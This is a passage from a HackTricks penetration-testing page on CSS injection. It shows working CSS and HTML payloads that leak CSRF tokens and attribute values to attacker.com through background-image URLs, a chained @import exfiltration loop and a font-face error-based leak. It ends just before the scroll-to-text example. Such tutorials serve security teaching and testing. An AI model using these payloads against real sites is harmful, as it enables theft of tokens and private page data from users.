🤖
hacktricks
  • 👾Welcome!
    • HackTricks
    • HackTricks Values & FAQ
    • About the author
  • 🤩Generic Methodologies & Resources
    • Pentesting Methodology
    • External Recon Methodology
      • Wide Source Code Search
      • Github Dorks & Leaks
    • Pentesting Network
      • DHCPv6
      • EIGRP Attacks
      • GLBP & HSRP Attacks
      • IDS and IPS Evasion
      • Lateral VLAN Segmentation Bypass
      • Network Protocols Explained (ESP)
      • Nmap Summary (ESP)
      • Pentesting IPv6
      • WebRTC DoS
      • Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
      • Spoofing SSDP and UPnP Devices with EvilSSDP
    • Pentesting Wifi
      • Evil Twin EAP-TLS
    • Phishing Methodology
      • Clone a Website
      • Detecting Phishing
      • Phishing Files & Documents
    • Basic Forensic Methodology
      • Baseline Monitoring
      • Anti-Forensic Techniques
      • Docker Forensics
      • Image Acquisition & Mount
      • Linux Forensics
      • Malware Analysis
      • Memory dump analysis
        • Volatility - CheatSheet
      • Partitions/File Systems/Carving
        • File/Data Carving & Recovery Tools
      • Pcap Inspection
        • DNSCat pcap analysis
        • Suricata & Iptables cheatsheet
        • USB Keystrokes
        • Wifi Pcap Analysis
        • Wireshark tricks
      • Specific Software/File-Type Tricks
        • Decompile compiled python binaries (exe, elf) - Retreive from .pyc
        • Browser Artifacts
        • Deofuscation vbs (cscript.exe)
        • Local Cloud Storage
        • Office file analysis
        • PDF File analysis
        • PNG tricks
        • Video and Audio file analysis
        • ZIPs tricks
      • Windows Artifacts
        • Interesting Windows Registry Keys
    • Brute Force - CheatSheet
    • Python Sandbox Escape & Pyscript
      • Bypass Python sandboxes
        • LOAD_NAME / LOAD_CONST opcode OOB Read
      • Class Pollution (Python's Prototype Pollution)
      • Python Internal Read Gadgets
      • Pyscript
      • venv
      • Web Requests
      • Bruteforce hash (few chars)
      • Basic Python
    • Exfiltration
    • Tunneling and Port Forwarding
    • Threat Modeling
    • Search Exploits
    • Reverse Shells (Linux, Windows, MSFVenom)
      • MSFVenom - CheatSheet
      • Reverse Shells - Windows
      • Reverse Shells - Linux
      • Full TTYs
  • 🐧Linux Hardening
    • Checklist - Linux Privilege Escalation
    • Linux Privilege Escalation
      • Arbitrary File Write to Root
      • Cisco - vmanage
      • Containerd (ctr) Privilege Escalation
      • D-Bus Enumeration & Command Injection Privilege Escalation
      • Docker Security
        • Abusing Docker Socket for Privilege Escalation
        • AppArmor
        • AuthZ& AuthN - Docker Access Authorization Plugin
        • CGroups
        • Docker --privileged
        • Docker Breakout / Privilege Escalation
          • release_agent exploit - Relative Paths to PIDs
          • Docker release_agent cgroups escape
          • Sensitive Mounts
        • Namespaces
          • CGroup Namespace
          • IPC Namespace
          • PID Namespace
          • Mount Namespace
          • Network Namespace
          • Time Namespace
          • User Namespace
          • UTS Namespace
        • Seccomp
        • Weaponizing Distroless
      • Escaping from Jails
      • euid, ruid, suid
      • Interesting Groups - Linux Privesc
        • lxd/lxc Group - Privilege escalation
      • Logstash
      • ld.so privesc exploit example
      • Linux Active Directory
      • Linux Capabilities
      • NFS no_root_squash/no_all_squash misconfiguration PE
      • Node inspector/CEF debug abuse
      • Payloads to execute
      • RunC Privilege Escalation
      • SELinux
      • Socket Command Injection
      • Splunk LPE and Persistence
      • SSH Forward Agent exploitation
      • Wildcards Spare tricks
    • Useful Linux Commands
    • Bypass Linux Restrictions
      • Bypass FS protections: read-only / no-exec / Distroless
        • DDexec / EverythingExec
    • Linux Environment Variables
    • Linux Post-Exploitation
      • PAM - Pluggable Authentication Modules
    • FreeIPA Pentesting
  • 🍏MacOS Hardening
    • macOS Security & Privilege Escalation
      • macOS Apps - Inspecting, debugging and Fuzzing
        • Objects in memory
        • Introduction to x64
        • Introduction to ARM64v8
      • macOS AppleFS
      • macOS Bypassing Firewalls
      • macOS Defensive Apps
      • macOS GCD - Grand Central Dispatch
      • macOS Kernel & System Extensions
        • macOS IOKit
        • macOS Kernel Extensions & Debugging
        • macOS Kernel Vulnerabilities
        • macOS System Extensions
      • macOS Network Services & Protocols
      • macOS File Extension & URL scheme app handlers
      • macOS Files, Folders, Binaries & Memory
        • macOS Bundles
        • macOS Installers Abuse
        • macOS Memory Dumping
        • macOS Sensitive Locations & Interesting Daemons
        • macOS Universal binaries & Mach-O Format
      • macOS Objective-C
      • macOS Privilege Escalation
      • macOS Process Abuse
        • macOS Dirty NIB
        • macOS Chromium Injection
        • macOS Electron Applications Injection
        • macOS Function Hooking
        • macOS IPC - Inter Process Communication
          • macOS MIG - Mach Interface Generator
          • macOS XPC
            • macOS XPC Authorization
            • macOS XPC Connecting Process Check
              • macOS PID Reuse
              • macOS xpc_connection_get_audit_token Attack
          • macOS Thread Injection via Task port
        • macOS Java Applications Injection
        • macOS Library Injection
          • macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES
          • macOS Dyld Process
        • macOS Perl Applications Injection
        • macOS Python Applications Injection
        • macOS Ruby Applications Injection
        • macOS .Net Applications Injection
      • macOS Security Protections
        • macOS Gatekeeper / Quarantine / XProtect
        • macOS Launch/Environment Constraints & Trust Cache
        • macOS Sandbox
          • macOS Default Sandbox Debug
          • macOS Sandbox Debug & Bypass
            • macOS Office Sandbox Bypasses
        • macOS Authorizations DB & Authd
        • macOS SIP
        • macOS TCC
          • macOS Apple Events
          • macOS TCC Bypasses
            • macOS Apple Scripts
          • macOS TCC Payloads
        • macOS Dangerous Entitlements & TCC perms
        • macOS - AMFI - AppleMobileFileIntegrity
        • macOS MACF - Mandatory Access Control Framework
        • macOS Code Signing
        • macOS FS Tricks
          • macOS xattr-acls extra stuff
      • macOS Users & External Accounts
    • macOS Red Teaming
      • macOS MDM
        • Enrolling Devices in Other Organisations
        • macOS Serial Number
      • macOS Keychain
    • macOS Useful Commands
    • macOS Auto Start
  • 🪟Windows Hardening
    • Checklist - Local Windows Privilege Escalation
    • Windows Local Privilege Escalation
      • Abusing Tokens
      • Access Tokens
      • ACLs - DACLs/SACLs/ACEs
      • AppendData/AddSubdirectory permission over service registry
      • Create MSI with WIX
      • COM Hijacking
      • Dll Hijacking
        • Writable Sys Path +Dll Hijacking Privesc
      • DPAPI - Extracting Passwords
      • From High Integrity to SYSTEM with Name Pipes
      • Integrity Levels
      • JuicyPotato
      • Leaked Handle Exploitation
      • MSI Wrapper
      • Named Pipe Client Impersonation
      • Privilege Escalation with Autoruns
      • RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
      • SeDebug + SeImpersonate copy token
      • SeImpersonate from High To System
      • Windows C Payloads
    • Active Directory Methodology
      • Abusing Active Directory ACLs/ACEs
        • Shadow Credentials
      • AD Certificates
        • AD CS Account Persistence
        • AD CS Domain Escalation
        • AD CS Domain Persistence
        • AD CS Certificate Theft
      • AD information in printers
      • AD DNS Records
      • ASREPRoast
      • BloodHound & Other AD Enum Tools
      • Constrained Delegation
      • Custom SSP
      • DCShadow
      • DCSync
      • Diamond Ticket
      • DSRM Credentials
      • External Forest Domain - OneWay (Inbound) or bidirectional
      • External Forest Domain - One-Way (Outbound)
      • Golden Ticket
      • Kerberoast
      • Kerberos Authentication
      • Kerberos Double Hop Problem
      • LAPS
      • MSSQL AD Abuse
      • Over Pass the Hash/Pass the Key
      • Pass the Ticket
      • Password Spraying / Brute Force
      • PrintNightmare
      • Force NTLM Privileged Authentication
      • Privileged Groups
      • RDP Sessions Abuse
      • Resource-based Constrained Delegation
      • Security Descriptors
      • SID-History Injection
      • Silver Ticket
      • Skeleton Key
      • Unconstrained Delegation
    • Windows Security Controls
      • UAC - User Account Control
    • NTLM
      • Places to steal NTLM creds
    • Lateral Movement
      • AtExec / SchtasksExec
      • DCOM Exec
      • PsExec/Winexec/ScExec
      • SmbExec/ScExec
      • WinRM
      • WmiExec
    • Pivoting to the Cloud
    • Stealing Windows Credentials
      • Windows Credentials Protections
      • Mimikatz
      • WTS Impersonator
    • Basic Win CMD for Pentesters
    • Basic PowerShell for Pentesters
      • PowerView/SharpView
    • Antivirus (AV) Bypass
  • 📱Mobile Pentesting
    • Android APK Checklist
    • Android Applications Pentesting
      • Android Applications Basics
      • Android Task Hijacking
      • ADB Commands
      • APK decompilers
      • AVD - Android Virtual Device
      • Bypass Biometric Authentication (Android)
      • content:// protocol
      • Drozer Tutorial
        • Exploiting Content Providers
      • Exploiting a debuggeable application
      • Frida Tutorial
        • Frida Tutorial 1
        • Frida Tutorial 2
        • Frida Tutorial 3
        • Objection Tutorial
      • Google CTF 2018 - Shall We Play a Game?
      • Install Burp Certificate
      • Intent Injection
      • Make APK Accept CA Certificate
      • Manual DeObfuscation
      • React Native Application
      • Reversing Native Libraries
      • Smali - Decompiling/[Modifying]/Compiling
      • Spoofing your location in Play Store
      • Tapjacking
      • Webview Attacks
    • iOS Pentesting Checklist
    • iOS Pentesting
      • iOS App Extensions
      • iOS Basics
      • iOS Basic Testing Operations
      • iOS Burp Suite Configuration
      • iOS Custom URI Handlers / Deeplinks / Custom Schemes
      • iOS Extracting Entitlements From Compiled Application
      • iOS Frida Configuration
      • iOS Hooking With Objection
      • iOS Protocol Handlers
      • iOS Serialisation and Encoding
      • iOS Testing Environment
      • iOS UIActivity Sharing
      • iOS Universal Links
      • iOS UIPasteboard
      • iOS WebViews
    • Cordova Apps
    • Xamarin Apps
  • 👽Network Services Pentesting
    • Pentesting JDWP - Java Debug Wire Protocol
    • Pentesting Printers
    • Pentesting SAP
    • Pentesting VoIP
      • Basic VoIP Protocols
        • SIP (Session Initiation Protocol)
    • Pentesting Remote GdbServer
    • 7/tcp/udp - Pentesting Echo
    • 21 - Pentesting FTP
      • FTP Bounce attack - Scan
      • FTP Bounce - Download 2ºFTP file
    • 22 - Pentesting SSH/SFTP
    • 23 - Pentesting Telnet
    • 25,465,587 - Pentesting SMTP/s
      • SMTP Smuggling
      • SMTP - Commands
    • 43 - Pentesting WHOIS
    • 49 - Pentesting TACACS+
    • 53 - Pentesting DNS
    • 69/UDP TFTP/Bittorrent-tracker
    • 79 - Pentesting Finger
    • 80,443 - Pentesting Web Methodology
      • 403 & 401 Bypasses
      • AEM - Adobe Experience Cloud
      • Angular
      • Apache
      • Artifactory Hacking guide
      • Bolt CMS
      • Buckets
        • Firebase Database
      • CGI
      • DotNetNuke (DNN)
      • Drupal
        • Drupal RCE
      • Electron Desktop Apps
        • Electron contextIsolation RCE via preload code
        • Electron contextIsolation RCE via Electron internal code
        • Electron contextIsolation RCE via IPC
      • Flask
      • NodeJS Express
      • Git
      • Golang
      • GWT - Google Web Toolkit
      • Grafana
      • GraphQL
      • H2 - Java SQL database
      • IIS - Internet Information Services
      • ImageMagick Security
      • JBOSS
      • Jira & Confluence
      • Joomla
      • JSP
      • Laravel
      • Moodle
      • Nginx
      • NextJS
      • PHP Tricks
        • PHP - Useful Functions & disable_functions/open_basedir bypass
          • disable_functions bypass - php-fpm/FastCGI
          • disable_functions bypass - dl function
          • disable_functions bypass - PHP 7.0-7.4 (*nix only)
          • disable_functions bypass - Imagick <= 3.3.0 PHP >= 5.4 Exploit
          • disable_functions - PHP 5.x Shellshock Exploit
          • disable_functions - PHP 5.2.4 ionCube extension Exploit
          • disable_functions bypass - PHP <= 5.2.9 on windows
          • disable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL
          • disable_functions bypass - PHP safe_mode bypass via proc_open() and custom environment Exploit
          • disable_functions bypass - PHP Perl Extension Safe_mode Bypass Exploit
          • disable_functions bypass - PHP 5.2.3 - Win32std ext Protections Bypass
          • disable_functions bypass - PHP 5.2 - FOpen Exploit
          • disable_functions bypass - via mem
          • disable_functions bypass - mod_cgi
          • disable_functions bypass - PHP 4 >= 4.2.0, PHP 5 pcntl_exec
        • PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])
        • PHP SSRF
      • PrestaShop
      • Python
      • Rocket Chat
      • Special HTTP headers
      • Source code Review / SAST Tools
      • Spring Actuators
      • Symfony
      • Tomcat
        • Basic Tomcat Info
      • Uncovering CloudFlare
      • VMWare (ESX, VCenter...)
      • Web API Pentesting
      • WebDav
      • Werkzeug / Flask Debug
      • Wordpress
    • 88tcp/udp - Pentesting Kerberos
      • Harvesting tickets from Windows
      • Harvesting tickets from Linux
    • 110,995 - Pentesting POP
    • 111/TCP/UDP - Pentesting Portmapper
    • 113 - Pentesting Ident
    • 123/udp - Pentesting NTP
    • 135, 593 - Pentesting MSRPC
    • 137,138,139 - Pentesting NetBios
    • 139,445 - Pentesting SMB
      • rpcclient enumeration
    • 143,993 - Pentesting IMAP
    • 161,162,10161,10162/udp - Pentesting SNMP
      • Cisco SNMP
      • SNMP RCE
    • 194,6667,6660-7000 - Pentesting IRC
    • 264 - Pentesting Check Point FireWall-1
    • 389, 636, 3268, 3269 - Pentesting LDAP
    • 500/udp - Pentesting IPsec/IKE VPN
    • 502 - Pentesting Modbus
    • 512 - Pentesting Rexec
    • 513 - Pentesting Rlogin
    • 514 - Pentesting Rsh
    • 515 - Pentesting Line Printer Daemon (LPD)
    • 548 - Pentesting Apple Filing Protocol (AFP)
    • 554,8554 - Pentesting RTSP
    • 623/UDP/TCP - IPMI
    • 631 - Internet Printing Protocol(IPP)
    • 700 - Pentesting EPP
    • 873 - Pentesting Rsync
    • 1026 - Pentesting Rusersd
    • 1080 - Pentesting Socks
    • 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
    • 1414 - Pentesting IBM MQ
    • 1433 - Pentesting MSSQL - Microsoft SQL Server
      • Types of MSSQL Users
    • 1521,1522-1529 - Pentesting Oracle TNS Listener
    • 1723 - Pentesting PPTP
    • 1883 - Pentesting MQTT (Mosquitto)
    • 2049 - Pentesting NFS Service
    • 2301,2381 - Pentesting Compaq/HP Insight Manager
    • 2375, 2376 Pentesting Docker
    • 3128 - Pentesting Squid
    • 3260 - Pentesting ISCSI
    • 3299 - Pentesting SAPRouter
    • 3306 - Pentesting Mysql
    • 3389 - Pentesting RDP
    • 3632 - Pentesting distcc
    • 3690 - Pentesting Subversion (svn server)
    • 3702/UDP - Pentesting WS-Discovery
    • 4369 - Pentesting Erlang Port Mapper Daemon (epmd)
    • 4786 - Cisco Smart Install
    • 4840 - OPC Unified Architecture
    • 5000 - Pentesting Docker Registry
    • 5353/UDP Multicast DNS (mDNS) and DNS-SD
    • 5432,5433 - Pentesting Postgresql
    • 5439 - Pentesting Redshift
    • 5555 - Android Debug Bridge
    • 5601 - Pentesting Kibana
    • 5671,5672 - Pentesting AMQP
    • 5800,5801,5900,5901 - Pentesting VNC
    • 5984,6984 - Pentesting CouchDB
    • 5985,5986 - Pentesting WinRM
    • 5985,5986 - Pentesting OMI
    • 6000 - Pentesting X11
    • 6379 - Pentesting Redis
    • 8009 - Pentesting Apache JServ Protocol (AJP)
    • 8086 - Pentesting InfluxDB
    • 8089 - Pentesting Splunkd
    • 8333,18333,38333,18444 - Pentesting Bitcoin
    • 9000 - Pentesting FastCGI
    • 9001 - Pentesting HSQLDB
    • 9042/9160 - Pentesting Cassandra
    • 9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream)
    • 9200 - Pentesting Elasticsearch
    • 10000 - Pentesting Network Data Management Protocol (ndmp)
    • 11211 - Pentesting Memcache
      • Memcache Commands
    • 15672 - Pentesting RabbitMQ Management
    • 24007,24008,24009,49152 - Pentesting GlusterFS
    • 27017,27018 - Pentesting MongoDB
    • 44134 - Pentesting Tiller (Helm)
    • 44818/UDP/TCP - Pentesting EthernetIP
    • 47808/udp - Pentesting BACNet
    • 50030,50060,50070,50075,50090 - Pentesting Hadoop
  • 🕸️Pentesting Web
    • Web Vulnerabilities Methodology
    • Reflecting Techniques - PoCs and Polygloths CheatSheet
      • Web Vulns List
    • 2FA/MFA/OTP Bypass
    • Account Takeover
    • Browser Extension Pentesting Methodology
      • BrowExt - ClickJacking
      • BrowExt - permissions & host_permissions
      • BrowExt - XSS Example
    • Bypass Payment Process
    • Captcha Bypass
    • Cache Poisoning and Cache Deception
      • Cache Poisoning via URL discrepancies
      • Cache Poisoning to DoS
    • Clickjacking
    • Client Side Template Injection (CSTI)
    • Client Side Path Traversal
    • Command Injection
    • Content Security Policy (CSP) Bypass
      • CSP bypass: self + 'unsafe-inline' with Iframes
    • Cookies Hacking
      • Cookie Tossing
      • Cookie Jar Overflow
      • Cookie Bomb
    • CORS - Misconfigurations & Bypass
    • CRLF (%0D%0A) Injection
    • CSRF (Cross Site Request Forgery)
    • Dangling Markup - HTML scriptless injection
      • SS-Leaks
    • Dependency Confusion
    • Deserialization
      • NodeJS - __proto__ & prototype Pollution
        • Client Side Prototype Pollution
        • Express Prototype Pollution Gadgets
        • Prototype Pollution to RCE
      • Java JSF ViewState (.faces) Deserialization
      • Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
      • Basic Java Deserialization (ObjectInputStream, readObject)
      • PHP - Deserialization + Autoload Classes
      • CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep
      • Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
      • Exploiting __VIEWSTATE knowing the secrets
      • Exploiting __VIEWSTATE without knowing the secrets
      • Python Yaml Deserialization
      • JNDI - Java Naming and Directory Interface & Log4Shell
      • Ruby Class Pollution
    • Domain/Subdomain takeover
    • Email Injections
    • File Inclusion/Path traversal
      • phar:// deserialization
      • LFI2RCE via PHP Filters
      • LFI2RCE via Nginx temp files
      • LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS
      • LFI2RCE via Segmentation Fault
      • LFI2RCE via phpinfo()
      • LFI2RCE Via temp file uploads
      • LFI2RCE via Eternal waiting
      • LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure
    • File Upload
      • PDF Upload - XXE and CORS bypass
    • Formula/CSV/Doc/LaTeX/GhostScript Injection
    • gRPC-Web Pentest
    • HTTP Connection Contamination
    • HTTP Connection Request Smuggling
    • HTTP Request Smuggling / HTTP Desync Attack
      • Browser HTTP Request Smuggling
      • Request Smuggling in HTTP/2 Downgrades
    • HTTP Response Smuggling / Desync
    • Upgrade Header Smuggling
    • hop-by-hop headers
    • IDOR
    • JWT Vulnerabilities (Json Web Tokens)
    • LDAP Injection
    • Login Bypass
      • Login bypass List
    • NoSQL injection
    • OAuth to Account takeover
    • Open Redirect
    • ORM Injection
    • Parameter Pollution
    • Phone Number Injections
    • PostMessage Vulnerabilities
      • Blocking main page to steal postmessage
      • Bypassing SOP with Iframes - 1
      • Bypassing SOP with Iframes - 2
      • Steal postmessage modifying iframe location
    • Proxy / WAF Protections Bypass
    • Race Condition
    • Rate Limit Bypass
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • Reverse Tab Nabbing
    • SAML Attacks
      • SAML Basics
    • Server Side Inclusion/Edge Side Inclusion Injection
    • SQL Injection
      • MS Access SQL Injection
      • MSSQL Injection
      • MySQL injection
        • MySQL File priv to SSRF/RCE
      • Oracle injection
      • Cypher Injection (neo4j)
      • PostgreSQL injection
        • dblink/lo_import data exfiltration
        • PL/pgSQL Password Bruteforce
        • Network - Privesc, Port Scanner and NTLM chanllenge response disclosure
        • Big Binary Files Upload (PostgreSQL)
        • RCE with PostgreSQL Languages
        • RCE with PostgreSQL Extensions
      • SQLMap - CheatSheet
        • Second Order Injection - SQLMap
    • SSRF (Server Side Request Forgery)
      • URL Format Bypass
      • SSRF Vulnerable Platforms
      • Cloud SSRF
    • SSTI (Server Side Template Injection)
      • EL - Expression Language
      • Jinja2 SSTI
    • Timing Attacks
    • Unicode Injection
      • Unicode Normalization
    • UUID Insecurities
    • WebSocket Attacks
    • Web Tool - WFuzz
    • XPATH injection
    • XSLT Server Side Injection (Extensible Stylesheet Language Transformations)
    • XXE - XEE - XML External Entity
    • XSS (Cross Site Scripting)
      • Abusing Service Workers
      • Chrome Cache to XSS
      • Debugging Client Side JS
      • Dom Clobbering
      • DOM Invader
      • DOM XSS
      • Iframes in XSS, CSP and SOP
      • Integer Overflow
      • JS Hoisting
      • Misc JS Tricks & Relevant Info
      • PDF Injection
      • Server Side XSS (Dynamic PDF)
      • Shadow DOM
      • SOME - Same Origin Method Execution
      • Sniff Leak
      • Steal Info JS
      • XSS in Markdown
    • XSSI (Cross-Site Script Inclusion)
    • XS-Search/XS-Leaks
      • Connection Pool Examples
      • Connection Pool by Destination Example
      • Cookie Bomb + Onerror XS Leak
      • URL Max Length - Client Side
      • performance.now example
      • performance.now + Force heavy task
      • Event Loop Blocking + Lazy images
      • JavaScript Execution XS Leak
      • CSS Injection
        • CSS Injection Code
    • Iframe Traps
  • ⛈️Cloud Security
    • Pentesting Kubernetes
    • Pentesting Cloud (AWS, GCP, Az...)
    • Pentesting CI/CD (Github, Jenkins, Terraform...)
  • 😎Hardware/Physical Access
    • Physical Attacks
    • Escaping from KIOSKs
    • Firmware Analysis
      • Bootloader testing
      • Firmware Integrity
  • 🎯Binary Exploitation
    • Basic Stack Binary Exploitation Methodology
      • ELF Basic Information
      • Exploiting Tools
        • PwnTools
    • Stack Overflow
      • Pointer Redirecting
      • Ret2win
        • Ret2win - arm64
      • Stack Shellcode
        • Stack Shellcode - arm64
      • Stack Pivoting - EBP2Ret - EBP chaining
      • Uninitialized Variables
    • ROP - Return Oriented Programing
      • BROP - Blind Return Oriented Programming
      • Ret2csu
      • Ret2dlresolve
      • Ret2esp / Ret2reg
      • Ret2lib
        • Leaking libc address with ROP
          • Leaking libc - template
        • One Gadget
        • Ret2lib + Printf leak - arm64
      • Ret2syscall
        • Ret2syscall - ARM64
      • Ret2vDSO
      • SROP - Sigreturn-Oriented Programming
        • SROP - ARM64
    • Array Indexing
    • Integer Overflow
    • Format Strings
      • Format Strings - Arbitrary Read Example
      • Format Strings Template
    • Libc Heap
      • Bins & Memory Allocations
      • Heap Memory Functions
        • free
        • malloc & sysmalloc
        • unlink
        • Heap Functions Security Checks
      • Use After Free
        • First Fit
      • Double Free
      • Overwriting a freed chunk
      • Heap Overflow
      • Unlink Attack
      • Fast Bin Attack
      • Unsorted Bin Attack
      • Large Bin Attack
      • Tcache Bin Attack
      • Off by one overflow
      • House of Spirit
      • House of Lore | Small bin Attack
      • House of Einherjar
      • House of Force
      • House of Orange
      • House of Rabbit
      • House of Roman
    • Common Binary Exploitation Protections & Bypasses
      • ASLR
        • Ret2plt
        • Ret2ret & Reo2pop
      • CET & Shadow Stack
      • Libc Protections
      • Memory Tagging Extension (MTE)
      • No-exec / NX
      • PIE
        • BF Addresses in the Stack
      • Relro
      • Stack Canaries
        • BF Forked & Threaded Stack Canaries
        • Print Stack Canary
    • Write What Where 2 Exec
      • WWW2Exec - atexit()
      • WWW2Exec - .dtors & .fini_array
      • WWW2Exec - GOT/PLT
      • WWW2Exec - __malloc_hook & __free_hook
    • Common Exploiting Problems
    • Windows Exploiting (Basic Guide - OSCP lvl)
    • iOS Exploiting
  • 🔩Reversing
    • Reversing Tools & Basic Methods
      • Angr
        • Angr - Examples
      • Z3 - Satisfiability Modulo Theories (SMT)
      • Cheat Engine
      • Blobrunner
    • Common API used in Malware
    • Word Macros
  • 🔮Crypto & Stego
    • Cryptographic/Compression Algorithms
      • Unpacking binaries
    • Certificates
    • Cipher Block Chaining CBC-MAC
    • Crypto CTFs Tricks
    • Electronic Code Book (ECB)
    • Hash Length Extension Attack
    • Padding Oracle
    • RC4 - Encrypt&Decrypt
    • Stego Tricks
    • Esoteric languages
    • Blockchain & Crypto Currencies
  • 🦂C2
    • Salseo
    • ICMPsh
    • Cobalt Strike
  • ✍️TODO
    • Other Big References
    • Rust Basics
    • More Tools
    • MISC
    • Pentesting DNS
    • Hardware Hacking
      • I2C
      • UART
      • Radio
      • JTAG
      • SPI
    • Industrial Control Systems Hacking
      • Modbus Protocol
    • Radio Hacking
      • Pentesting RFID
      • Infrared
      • Sub-GHz RF
      • iButton
      • Flipper Zero
        • FZ - NFC
        • FZ - Sub-GHz
        • FZ - Infrared
        • FZ - iButton
        • FZ - 125kHz RFID
      • Proxmark 3
      • FISSURE - The RF Framework
      • Low-Power Wide Area Network
      • Pentesting BLE - Bluetooth Low Energy
    • Industrial Control Systems Hacking
    • Test LLMs
    • LLM Training
      • 0. Basic LLM Concepts
      • 1. Tokenizing
      • 2. Data Sampling
      • 3. Token Embeddings
      • 4. Attention Mechanisms
      • 5. LLM Architecture
      • 6. Pre-training & Loading models
      • 7.0. LoRA Improvements in fine-tuning
      • 7.1. Fine-Tuning for Classification
      • 7.2. Fine-Tuning to follow instructions
    • Burp Suite
    • Other Web Tricks
    • Interesting HTTP
    • Android Forensics
    • TR-069
    • 6881/udp - Pentesting BitTorrent
    • Online Platforms with API
    • Stealing Sensitive Information Disclosure from a Web
    • Post Exploitation
    • Investment Terms
    • Cookies Policy
Powered by GitBook
On this page
  • CSS Injection
  • Attribute Selector
  • Blind Attribute Selector
  • @import
  • Other selectors
  • Error based XS-Search
  • Styling Scroll-to-Text Fragment
  • @font-face / unicode-range
  • Text node exfiltration (I): ligatures
  • Text node exfiltration (II): leaking the charset with a default font (not requiring external assets)
  • Text node exfiltration (III): leaking the charset with a default font by hiding elements (not requiring external assets)
  • Text node exfiltration (III): leaking the charset by cache timing (not requiring external assets)
  • Text node exfiltration (III): leaking the charset by timing loading hundreds of local "fonts" (not requiring external assets)
  • References
Edit on GitHub
  1. Pentesting Web
  2. XS-Search/XS-Leaks

CSS Injection

PreviousJavaScript Execution XS LeakNextCSS Injection Code

Last updated 7 months ago

Learn & practice AWS Hacking: Learn & practice GCP Hacking:

Support HackTricks
  • Check the !

  • Join the 💬 or the or follow us on Twitter 🐦 .

  • Share hacking tricks by submitting PRs to the and github repos.

CSS Injection

Attribute Selector

CSS selectors are crafted to match values of an input element's name and value attributes. If the input element's value attribute starts with a specific character, a predefined external resource is loaded:

input[name=csrf][value^=a]{
    background-image: url(https://attacker.com/exfil/a);
}
input[name=csrf][value^=b]{
    background-image: url(https://attacker.com/exfil/b);
}
/* ... */
input[name=csrf][value^=9]{
    background-image: url(https://attacker.com/exfil/9);   
}

However, this approach faces a limitation when dealing with hidden input elements (type="hidden") because hidden elements do not load backgrounds.

Bypass for Hidden Elements

To circumvent this limitation, you can target a subsequent sibling element using the ~ general sibling combinator. The CSS rule then applies to all siblings following the hidden input element, causing the background image to load:

input[name=csrf][value^=csrF] ~ * {
    background-image: url(https://attacker.com/exfil/csrF);
}

Prerequisites for CSS Injection

For the CSS Injection technique to be effective, certain conditions must be met:

  1. Payload Length: The CSS injection vector must support sufficiently long payloads to accommodate the crafted selectors.

  2. CSS Re-evaluation: You should have the ability to frame the page, which is necessary to trigger the re-evaluation of CSS with newly generated payloads.

  3. External Resources: The technique assumes the ability to use externally hosted images. This might be restricted by the site's Content Security Policy (CSP).

Blind Attribute Selector

<style>
html:has(input[name^="m"]):not(input[name="mytoken"]) {
  background:url(/m);
}
</style>
<input name=mytoken value=1337>
<input name=myname value=gareth>

@import

The previous technique has some drawbacks, check the prerequisites. You either need to be able to send multiple links to the victim, or you need to be able to iframe the CSS injection vulnerable page.

However, there is another clever technique that uses CSS @import to improve the quality of the technique.

Instead of loading the same page once and again with tens of different payloads each time (like in the previous one), we are going to load the page just once and just with an import to the attackers server (this is the payload to send to the victim):

@import url('//attacker.com:5001/start?');
  1. The import is going to receive some CSS script from the attackers and the browser will load it.

  2. The first part of the CSS script the attacker will send is another @import to the attackers server again.

    1. The attackers server won't respond this request yet, as we want to leak some chars and then respond this import with the payload to leak the next ones.

  3. The second and bigger part of the payload is going to be an attribute selector leakage payload

    1. This will send to the attackers server the first char of the secret and the last one

  4. Once the attackers server has received the first and last char of the secret, it will respond the import requested in the step 2.

    1. The response is going to be exactly the same as the steps 2, 3 and 4, but this time it will try to find the second char of the secret and then penultimate.

The attacker will follow that loop until it manages to leak completely the secret.

The script will try to discover 2 chars each time (from the beginning and from the end) because the attribute selector allows to do things like:

/* value^=  to match the beggining of the value*/
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}

/* value$=  to match the ending of the value*/
input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}

This allows the script to leak the secret faster.

Sometimes the script doesn't detect correctly that the prefix + suffix discovered is already the complete flag and it will continue forwards (in the prefix) and backwards (in the suffix) and at some point it will hang. No worries, just check the output because you can see the flag there.

Other selectors

Other ways to access DOM parts with CSS selectors:

  • .class-to-search:nth-child(2): This will search the second item with class "class-to-search" in the DOM.

  • [role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); }

Error based XS-Search

The overall intention is to use a custom font from a controlled endpoint and ensure that text (in this case, 'A') is displayed with this font only if the specified resource (favicon.ico) cannot be loaded.

<!DOCTYPE html>
<html>
<head>
    <style>
    @font-face{
        font-family: poc; 
        src: url(http://attacker.com/?leak); 
        unicode-range:U+0041;
    }

    #poc0{
        font-family: 'poc';
    }

    </style>
</head>
<body>

<object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
</body>
</html>
  1. Custom Font Usage:

    • A custom font is defined using the @font-face rule within a <style> tag in the <head> section.

    • The font is named poc and is fetched from an external endpoint (http://attacker.com/?leak).

    • The unicode-range property is set to U+0041, targeting the specific Unicode character 'A'.

  2. Object Element with Fallback Text:

    • An <object> element with id="poc0" is created in the <body> section. This element tries to load a resource from http://192.168.0.1/favicon.ico.

    • The font-family for this element is set to 'poc', as defined in the <style> section.

    • If the resource (favicon.ico) fails to load, the fallback content (the letter 'A') inside the <object> tag is displayed.

    • The fallback content ('A') will be rendered using the custom font poc if the external resource cannot be loaded.

Styling Scroll-to-Text Fragment

A security concern arises when attackers exploit the Scroll-to-text fragment feature, allowing them to confirm the presence of specific text on a webpage by loading a resource from their server through HTML injection. The method involves injecting a CSS rule like this:

